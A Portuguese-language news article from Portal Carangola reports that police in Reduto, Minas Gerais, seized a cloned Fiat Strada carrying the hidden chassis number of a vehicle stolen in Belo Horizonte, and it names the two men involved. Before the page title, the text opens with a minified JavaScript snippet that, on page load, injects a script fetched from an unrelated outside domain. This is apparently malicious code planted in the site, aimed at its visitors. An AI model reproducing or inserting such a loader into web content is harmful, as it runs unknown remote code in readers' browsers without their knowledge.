;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PM de Reduto apreende veículo clonado. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PM de Reduto apreende veículo clonado.

Equipe composta pelo Sgt Luiz Narcizo e Soldado Duarte, receberam uma denúncia anônima dando conta que estava rodando na cidade de Reduto uma caminhonete FIAT Strada, cor: cinza, placa: HMV8196 clonada. De posse desta informação, através dos sistemas informatizados da Polícia, foi descoberto haver dois registros feitos na 2ª Delegacia de Polícia de Contagem/MG, relatando que o veículo havia notificações de trânsito que não eram dela e que possivelmente estaria clonada. Foi realizado alguns levantamentos e chegamos até o cidadão Geraldo José Pacheco, 64 anos, vulgo: “Pachecão” que se encontrava com o referido veículo. No local o cidadão apresentou um documento similar ao CRLV original que também foi apreendido para a perícia determinar se é falso e, foi alegou que estava comprando o veículo do autor Ramon Ribeiro, 18 anos, e que iria procurar a PM para saber a situação do veículo, pois, se estivesse tudo bem iria comprá-la. Após vistoriar o referido veículo, constatamos que o chassi atrás do banco do passageiro e era “trepado”, pois retiramos uma placa de aço com uma numeração de chassi e descobrimos o verdadeiro chassi da real FIAT/Strada Adventure CD, placa OMB 4720, tomada de assalto na cidade de Belo Horizonte-MG, no dia 01/08/2013. Os dois homens vão responder em liberdade e foi aberto um inquérito.
A PM de Reduto adverte ao fato de se conferir minunciosamente todos os dados do veículo, incluindo placas, lacres, chassis, documentos, a fim de localizar algumas imperfeições haja vista existirem quadrilhas especializadas em clonar veículos inclusive com a emissão de documentos falsos que podem enganar a uma rápida conferência.

Informação e fotos: Felipe Duarte.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.